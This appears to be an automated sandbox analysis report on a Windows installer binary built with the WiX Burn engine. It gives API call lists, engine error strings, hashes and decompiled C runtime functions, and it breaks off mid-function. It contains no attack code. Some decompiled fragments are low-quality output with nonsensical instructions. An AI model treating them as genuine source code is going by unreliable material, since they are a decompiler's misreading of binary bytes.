                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post elevate message.
                                                                                                                                                                  • API String ID: 2609174426-4098423239
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(C68B5F08,BootstrapperApplicationDestroy), ref: 00408AAC
                                                                                                                                                                  • FreeLibrary.KERNEL32(C68B5F08,?,004014A5,000000B8,?,?,?,00401EA4,?,?), ref: 00408ABB
                                                                                                                                                                  • GetLastError.KERNEL32(?,004014A5,000000B8,?,?,?,00401EA4,?,?), ref: 00408AC5
                                                                                                                                                                  Strings
                                                                                                                                                                  • BootstrapperApplicationDestroy, xrefs: 00408AA4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryProc
                                                                                                                                                                  • String ID: BootstrapperApplicationDestroy
                                                                                                                                                                  • API String ID: 1144718084-3186005537
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post shutdown message., xrefs: 004180C5
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 004180BB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                                  • API String ID: 2609174426-188808143
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post apply message., xrefs: 00417A13
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417A09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                                  • API String ID: 2609174426-1304321051
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(0000C3E8,00000000,?,004240AD,00401F17,00000000,?,00418F3C,00401F17,004021A7,?,00411691,?,?,00401E27,?), ref: 004231A9
                                                                                                                                                                  • GetLastError.KERNEL32(?,004240AD,00401F17,00000000,?,00418F3C,00401F17,004021A7,?,00411691,?,?,00401E27,?,00401E67,WixBundleElevated), ref: 004231B3
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 004231D7
                                                                                                                                                                  • Failed to set begin operation event., xrefs: 004231E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                  • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                  • API String ID: 3848097054-4159625223
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post detect message., xrefs: 00417AA2
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417A98
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                                  • API String ID: 2609174426-598219917
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 0042BEEA
                                                                                                                                                                    • Part of subcall function 0042BF92: __mtinitlocknum.LIBCMT ref: 0042BFA4
                                                                                                                                                                    • Part of subcall function 0042BF92: EnterCriticalSection.KERNEL32(00000000,?,00429541,0000000D,004540B8,00000008,004294D3,00000000,00000000,004079F6,?,00000000,00000000), ref: 0042BFBD
                                                                                                                                                                  • _free.LIBCMT ref: 0042BF1B
                                                                                                                                                                  • _free.LIBCMT ref: 0042BF24
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _free$CriticalEnterSection__lock__mtinitlocknum
                                                                                                                                                                  • String ID: P|E
                                                                                                                                                                  • API String ID: 3990512260-381776967
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to post plan message., xrefs: 00417FB9
                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 00417FAF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                                                                  • API String ID: 2609174426-2952114608
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0042967B,00000000,?,0042BC0E,000000FF,0000001E,?,00000000,00000000,?,0042C16B), ref: 0042964D
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042965F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 1646373207-1276376045
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100181BA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				char _t43;
                                                                                                                                                                  				char _t46;
                                                                                                                                                                  				signed int _t53;
                                                                                                                                                                  				signed int _t54;
                                                                                                                                                                  				intOrPtr _t56;
                                                                                                                                                                  				intOrPtr _t57;
                                                                                                                                                                  				int _t58;
                                                                                                                                                                  				signed short* _t59;
                                                                                                                                                                  				short* _t60;
                                                                                                                                                                  				int _t65;
                                                                                                                                                                  				char* _t72;
                                                                                                                                                                  
                                                                                                                                                                  				_t72 = _a8;
                                                                                                                                                                  				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                  					L5:
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if( *_t72 != 0) {
                                                                                                                                                                  						E1000D555( &_v20, __edi, _a16);
                                                                                                                                                                  						_t43 = _v20;
                                                                                                                                                                  						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                  						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                  							_t46 = E10013A7B( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                  							__eflags = _t46;
                                                                                                                                                                  							if(_t46 == 0) {
                                                                                                                                                                  								__eflags = _a4;
                                                                                                                                                                  								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                                  								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                                  									L10:
                                                                                                                                                                  									__eflags = _v8;
                                                                                                                                                                  									if(_v8 != 0) {
                                                                                                                                                                  										_t53 = _v12;
                                                                                                                                                                  										_t11 = _t53 + 0x70;
                                                                                                                                                                  										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                  										__eflags =  *_t11;
                                                                                                                                                                  									}
                                                                                                                                                                  									return 1;
                                                                                                                                                                  								}
                                                                                                                                                                  								L21:
                                                                                                                                                                  								_t54 = E1000F780(__eflags);
                                                                                                                                                                  								 *_t54 = 0x2a;
                                                                                                                                                                  								__eflags = _v8;
                                                                                                                                                                  								if(_v8 != 0) {
                                                                                                                                                                  									_t54 = _v12;
                                                                                                                                                                  									_t33 = _t54 + 0x70;
                                                                                                                                                                  									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                  									__eflags =  *_t33;
                                                                                                                                                                  								}
                                                                                                                                                                  								return _t54 | 0xffffffff;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t56 = _v20;
                                                                                                                                                                  							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                  							_t65 =  *_t15;
                                                                                                                                                                  							__eflags = _t65 - 1;
                                                                                                                                                                  							if(_t65 <= 1) {
                                                                                                                                                                  								L17:
                                                                                                                                                                  								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                  								__eflags = _a12 -  *_t24;
                                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t72[1];
                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  								L19:
                                                                                                                                                                  								__eflags = _v8;
                                                                                                                                                                  								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                  								_t57 =  *_t27;
                                                                                                                                                                  								if(_v8 == 0) {
                                                                                                                                                                  									return _t57;
                                                                                                                                                                  								}
                                                                                                                                                                  								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                  								return _t57;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _a12 - _t65;
                                                                                                                                                                  							if(_a12 < _t65) {
                                                                                                                                                                  								goto L17;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _a4;
                                                                                                                                                                  							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                                                                                  							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                  							_t56 = _v20;
                                                                                                                                                                  							if(_t58 != 0) {
                                                                                                                                                                  								goto L19;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L17;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t59 = _a4;
                                                                                                                                                                  						__eflags = _t59;
                                                                                                                                                                  						if(_t59 != 0) {
                                                                                                                                                                  							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t60 = _a4;
                                                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                                                  							 *_t60 = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L5;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}


















                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100181EA
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 1001821E
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 1001824F
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 100182BD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,00401F56,?,?,?,?,?,?,?), ref: 00401AC6
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00401F56,?,?,?,?,?,?,?), ref: 00401ADA
                                                                                                                                                                  • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401F56,?,?,?,?), ref: 00401BB1
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00401F56,?,?,?,?), ref: 00401BB8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalDeleteSection$CloseFreeHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 882612062-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,00401414), ref: 00412555
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to ensure cache directory to remove was backslash terminated., xrefs: 0041250F
                                                                                                                                                                  • Failed to combine id to root cache path., xrefs: 004124F9
                                                                                                                                                                  • Failed to calculate root cache path., xrefs: 004124DD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID: Failed to calculate root cache path.$Failed to combine id to root cache path.$Failed to ensure cache directory to remove was backslash terminated.
                                                                                                                                                                  • API String ID: 3472027048-541824359
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042F617
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 0042F645
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 0042F673
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 0042F6A9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1000C9F5(signed char __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi) {
                                                                                                                                                                  				signed char _t12;
                                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                  				signed char _t37;
                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                  				signed int _t42;
                                                                                                                                                                  
                                                                                                                                                                  				_t36 = __edx;
                                                                                                                                                                  				_t11 = __eax;
                                                                                                                                                                  				do {
                                                                                                                                                                  					 *_t11 =  *_t11 + _t36;
                                                                                                                                                                  					asm("rol dh, 1");
                                                                                                                                                                  					 *_t11 =  *_t11 + _t36;
                                                                                                                                                                  					_t12 = _t11 ^ 0x000000ba;
                                                                                                                                                                  					 *_t12 =  *_t12 + _t36;
                                                                                                                                                                  					asm("adc al, 0xbe");
                                                                                                                                                                  					 *_t12 =  *_t12 + _t36;
                                                                                                                                                                  					_t37 = _t36 & _t12;
                                                                                                                                                                  					 *_t12 =  *_t12 + _t37;
                                                                                                                                                                  					 *_t12 = 0x10;
                                                                                                                                                                  					asm("movsd");
                                                                                                                                                                  					 *_t12 =  *_t12 + _t37;
                                                                                                                                                                  					asm("rol dword [eax], 0x10");
                                                                                                                                                                  					_t36 = 0xc5;
                                                                                                                                                                  					 *0xbd851000 =  *0xbd851000 + 0xc5;
                                                                                                                                                                  					_push(ss);
                                                                                                                                                                  					 *0xbd851000 =  *0xbd851000 + 0xc5;
                                                                                                                                                                  					 *0xFFFFFFFF7A7B2000 =  *((intOrPtr*)(0xffffffff7a7b2000)) + 0xc5;
                                                                                                                                                                  					 *(0xffffffff7a7b2000 & _t42) =  *(0xffffffff7a7b2000 & _t42) + 0xc5;
                                                                                                                                                                  					_t11 = 0xbc671000;
                                                                                                                                                                  					 *0xbc671000 =  *0xbc671000 + 0xc5;
                                                                                                                                                                  				} while ( *0xbc671000 >= 0);
                                                                                                                                                                  				 *0xbc671000 =  *0xbc671000 + 0xc5;
                                                                                                                                                                  				asm("les eax, [eax]");
                                                                                                                                                                  				asm("adc [edx+0xc], ch");
                                                                                                                                                                  				_push(0xc);
                                                                                                                                                                  				_push(0x103314d0);
                                                                                                                                                                  				_t18 = E10010594(0xbc671000, __edi, 0xc2af1000);
                                                                                                                                                                  				_t40 =  *((intOrPtr*)(_t42 + 8));
                                                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                                                  					if( *0x10337f3c != 3) {
                                                                                                                                                                  						_push(_t40);
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						L1000FA63(4);
                                                                                                                                                                  						 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                                                                                                                                                                  						_t23 = E1000FADC(_t40);
                                                                                                                                                                  						 *((intOrPtr*)(_t42 - 0x1c)) = _t23;
                                                                                                                                                                  						if(_t23 != 0) {
                                                                                                                                                                  							_push(_t40);
                                                                                                                                                                  							_push(_t23);
                                                                                                                                                                  							E1000FB07();
                                                                                                                                                                  						}
                                                                                                                                                                  						 *(_t42 - 4) = 0xfffffffe;
                                                                                                                                                                  						_t18 = E1000CA96();
                                                                                                                                                                  						if( *((intOrPtr*)(_t42 - 0x1c)) == 0) {
                                                                                                                                                                  							_push( *((intOrPtr*)(_t42 + 8)));
                                                                                                                                                                  							L10:
                                                                                                                                                                  							_t18 = HeapFree( *0x10335310, 0, ??);
                                                                                                                                                                  							_t48 = _t18;
                                                                                                                                                                  							if(_t18 == 0) {
                                                                                                                                                                  								_t20 = E1000F780(_t48);
                                                                                                                                                                  								 *_t20 = E1000F745(GetLastError());
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return E100105D9(_t18);
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction ID: 7764d91bb7ab2f2a00e23681c00b78d4a37f2ec3e5ecfdf2bc9b2b987e4ed42f
                                                                                                                                                                  • Opcode Fuzzy Hash: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction Fuzzy Hash: FA21F17AA0D3895FEB03CB704C85A893F60DF072D5F0A00DAE0449B1E7DA748C09CB52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00401E67), ref: 00435AC5
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00435AD1
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00435B45
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435B50
                                                                                                                                                                    • Part of subcall function 00435CFF: SysAllocString.OLEAUT32(?), ref: 00435D14
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 347726874-0
                                                                                                                                                                  • Opcode ID: c1c8f39274ece4991e9d83602e55827c75e17052a9171c67ade535ba7c596e35
                                                                                                                                                                  • Instruction ID: dede63f686c3db8059b666864581682c9699a9eade638963967dfe297755da23
                                                                                                                                                                  • Opcode Fuzzy Hash: c1c8f39274ece4991e9d83602e55827c75e17052a9171c67ade535ba7c596e35
                                                                                                                                                                  • Instruction Fuzzy Hash: 30214C71901619ABCB14DFA4D848EAFBBB8EF48715F101169E901AB210D735ED01CFA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A3D0(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = E1000CAD0(_a4);
                                                                                                                                                                  				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
                                                                                                                                                                  				_t9 = _v8 + 2; // 0x2
                                                                                                                                                                  				_v16 = L1000CEAF(__ebx, _a4, __edi, __esi, _v8 + _t9);
                                                                                                                                                                  				_t13 = _v8 + 2; // 0x2
